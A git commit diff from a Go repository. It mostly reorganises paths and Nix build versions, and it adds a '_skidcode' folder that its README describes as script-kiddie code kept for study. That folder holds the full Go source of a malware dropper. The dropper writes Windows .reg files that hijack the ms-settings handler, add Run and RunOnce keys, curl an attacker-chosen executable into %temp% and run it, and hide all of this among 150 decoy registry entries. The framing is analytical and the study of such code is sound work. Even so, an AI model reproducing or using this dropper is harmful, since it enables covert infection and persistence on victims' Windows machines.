reorg the tree again

Signed-off-by: Xe Iaso <[email protected]>

cmd/_skidcode/README.md

@@ -0,0 +1,5 @@
+# skidcode
+
+This folder contains Go code written by script kiddies for study and
+analysis. None of this code was written by me. It is stored in this
+GitHub repository as a reference for others.

cmd/_skidcode/e621_reg_dropper/README.md

@@ -0,0 +1,21 @@
+# `e621_reg_dropper`
+
+This is a code snippet from the script kiddie that claimed to have
+access to the database for e621. They claimed that this access would
+let them dump a database of all e621 users.
+
+After a month no such database has been released.
+
+The Go program in this folder will create a `.reg` file that
+automatically downloads and runs an arbitrary program that the
+attacker specifies. It additionally tries to cloak itself by inserting
+a bunch of garbage into the registry. The attacker-defined program
+will run when the machine reboots, allowing a gap between infection
+and activation.
+
+Somehow, these generated `.reg` files are not detected by virus
+scanners and a social engineering attack would be required to use this
+as a stage in a longer attack.
+
+This is overwhelmingly bad code though, I wouldn't let this pass in
+code reviews.

cmd/_skidcode/e621_reg_dropper/main.go

@@ -0,0 +1,144 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"log"
+	"math/rand"
+	"os"
+	"strings"
+	"time"
+)
+
+func main() {
+	commandArgs := os.Args
+	if len(commandArgs) < 3 {
+		log.Fatalf("Usage: %s <direct_link> <output> </spoofed_message> </extra_registry_keys>", commandArgs[0])
+	}
+
+	directDownloadLink := commandArgs[1]
+	outputFilename := commandArgs[2]
+
+	spoofedMessage := ""
+	generateExtraKeys := true
+
+	if len(commandArgs) == 4 {
+		spoofedMessage = commandArgs[3]
+	}
+	if len(commandArgs) == 5 {
+		spoofedMessage = commandArgs[3]
+		generateExtraKeys = (commandArgs[4] == "true")
+	}
+
+	if spoofedMessage != "" {
+		outputFilename += fmt.Sprintf("%%n%%n%s%%n%%0", spoofedMessage)
+	}
+
+	outputFilename += ".reg"
+
+	sections := make([][]string, 0)
+
+	randomIdentifier := GenerateRandomString(8)
+	secondaryRandomIdentifier := GenerateRandomString(8)
+
+	sections = append(sections, []string{"[HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\shell\\open\\command]", "(Default)=\"C:\\Windows\\System32\\cmd.exe\"", "DelegateExecute=\"\""})
+
+	cmdSequence := []string{
+		"echo @echo off",
+		fmt.Sprintf("curl %s -o %%temp%%\\calc.exe", directDownloadLink),
+		"%temp%\\calc.exe",
+		"exit",
+	}
+
+	cmdOutputStr := "cmd /c \\\"("
+	for i, command := range cmdSequence {
+		if i > 0 {
+			cmdOutputStr += " & "
+		}
+		cmdOutputStr += fmt.Sprintf("echo %s", command)
+	}
+	cmdOutputStr += fmt.Sprintf(")\\\" > %%temp%%\\%s.bat", randomIdentifier)
+
+	registryKeyStr := fmt.Sprintf("\"%s\"=\"%s\"", randomIdentifier, cmdOutputStr)
+	secondaryRegistryKeyStr := fmt.Sprintf("\"%s\"=\"cmd /c echo start /min cmd /c %%temp%%\\%s.bat >> c:\\Users\\public\\%s.bat\"", secondaryRandomIdentifier, randomIdentifier, randomIdentifier)
+
+	sections = append(sections, []string{"[HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]", registryKeyStr, secondaryRegistryKeyStr})
+
+	uacTrigger := fmt.Sprintf("\"%s\"=\"c:\\Users\\public\\%s.bat\"", randomIdentifier, randomIdentifier)
+	sections = append(sections, []string{"[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce]", uacTrigger})
+
+	fakeRegistrySections := make([][]string, 0)
+
+	if generateExtraKeys {
+		fakeRegistrySections = generateFakeRegistrySections(150)
+	}
+
+	sections = append(sections, fakeRegistrySections...)
+
+	// shuffle the sections
+	rand.Seed(time.Now().UnixNano())
+	rand.Shuffle(len(sections), func(i, j int) { sections[i], sections[j] = sections[j], sections[i] })
+
+	allLines := make([]string, 0)
+	for _, section := range sections {
+		allLines = append(allLines, section...)
+		allLines = append(allLines, "")
+	}
+
+	ioutil.WriteFile(outputFilename, []byte("Windows Registry Editor Version 5.00\r\n"+strings.Join(allLines, "\r\n")), 0644)
+}
+
+func GenerateRandomString(length int) string {
+	const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
+	rand.Seed(time.Now().UnixNano())
+
+	result := make([]byte, length)
+	for index := range result {
+		result[index] = charset[rand.Intn(len(charset))]
+	}
+	return string(result)
+}
+
+func generateFakeRegistrySections(numSections int) [][]string {
+	fakeRegistryKeys := []string{
+		"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\",
+		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\",
+		"HKEY_CURRENT_USER\\Control Panel\\Desktop\\",
+		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\",
+		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\",
+		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
+		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\",
+		"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\AppID\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\CLSID\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\TypeLib\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\AppID\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden\\SHOWALL\\",
+	}
+
+	fakeRegistrySections := make([][]string, 0)
+
+	for i := 0; i < numSections; i++ {
+		section := []string{}
+		section = append(section, fmt.Sprintf("[%s\\%s]", fakeRegistryKeys[rand.Intn(len(fakeRegistryKeys))], GenerateRandomString(8)))
+		section = append(section, fmt.Sprintf("\"%s\"=\"%s\"", GenerateRandomString(8), GenerateRandomString(9)))
+		fakeRegistrySections = append(fakeRegistrySections, section)
+	}
+
+	return fakeRegistrySections
+}

cmd/hlang/h/parser.go

@@ -6,7 +6,7 @@ import (
 	"fmt"
 
 	"github.com/eaburns/peggy/peg"
-	"within.website/x/jbo/namcu"
+	"within.website/x/langs/jbo/namcu"
 )
 
 func (p *_Parser) Parse() (int, bool) {

flake.nix

@@ -57,6 +57,8 @@
           ];
         };
 
+        version = "${self.sourceInfo.lastModifiedDate}";
+
         rust = pkgs.rust-bin.stable.latest.default.override {
           extensions = [ "rust-src" ];
           targets = [ "wasm32-wasi" ];
@@ -69,7 +71,7 @@
 
         everything = pkgs.buildGoApplication {
           pname = "xe-x-composite";
-          version = "1.4.0";
+          inherit version;
           src = ./.;
           modules = ./gomod2nix.toml;
 
@@ -83,7 +85,7 @@
 
         xedn = pkgs.buildGoApplication {
           pname = "xedn";
-          version = "1.2.3";
+          inherit version;
           src = ./.;
           modules = ./gomod2nix.toml;
           subPackages = [ "cmd/xedn" ];
@@ -148,10 +150,10 @@
 
         robocadey2 = pkgs.buildGoApplication {
           pname = "robocadey2";
-          version = "1.2.3";
+          inherit version;
           src = ./.;
           modules = ./gomod2nix.toml;
-          subPackages = [ "mastodon/robocadey2" ];
+          subPackages = [ "cmd/robocadey2" ];
         };
 
         copyFile = { pname, path ? pname }:

tokipona/nimi.go → langs/tokipona/nimi.go

@@ -4,7 +4,7 @@ import (
 	"bytes"
 	"encoding/json"
 
-	"within.website/x/tokipona/internal"
+	"within.website/x/langs/tokipona/internal"
 )
 
 // Word is a single word in the Toki Pona dictionary.